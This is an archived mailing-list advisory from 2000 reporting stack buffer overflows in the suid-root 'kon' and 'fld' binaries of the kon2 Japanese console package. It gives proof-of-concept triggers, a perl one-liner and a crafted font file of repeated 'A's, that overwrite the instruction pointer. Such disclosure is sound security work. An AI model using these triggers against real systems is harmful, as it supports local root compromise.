|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Problems with "kon2" package
From: Chris Evans (chris
FERRET.LMH.OX.AC.UK)Date: Mon Jun 19 2000 - 17:51:53 CDT
- Next message: Chris Evans: "XFree86: libICE DoS"
- Previous message: Chris Evans: "XFree86: Various nasty libX11 holes"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi,
I had reason to investigate the security of a package called "kon2" - a
program for displaying Japanese on the console I'm led to believe.
SUMMARY
=======
kon2-0.3.9
In the version I briefly examined, there were three suid-root execuatbles
- kon
- fld
- newvc
Here are details of breakages in "kon" and "fld". I believe both lead to
root compromise, although I haven't verified if something has dropped root
privileges or not at the time of the overflows.
DEMOS
=====
No discussion of code flaws today, because boring stack overflows are
being used
1) kon
kon VGA -StartupMessage `perl -e 'print "A"x10000'`
=> segfault with EIP 0x41414141
2) fld
a) Create file "read.me.and.die", contents:
CHARSET_REGISTRY"AAAAAAAAAAAAAAAAAAA"
CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"
CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"
...
BUT substitute each sequence of A's for 200 A's
b) fld -t bdf read.me.and.die
I don't get a clean 0x41414141 stacktrace but that's just a minor detail,
and these things are always circumventable (I think a pointer gets
toasted inbetween two char[] buffers on the stack)
Cheers
Chris
- Next message: Chris Evans: "XFree86: libICE DoS"
- Previous message: Chris Evans: "XFree86: Various nasty libX11 holes"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]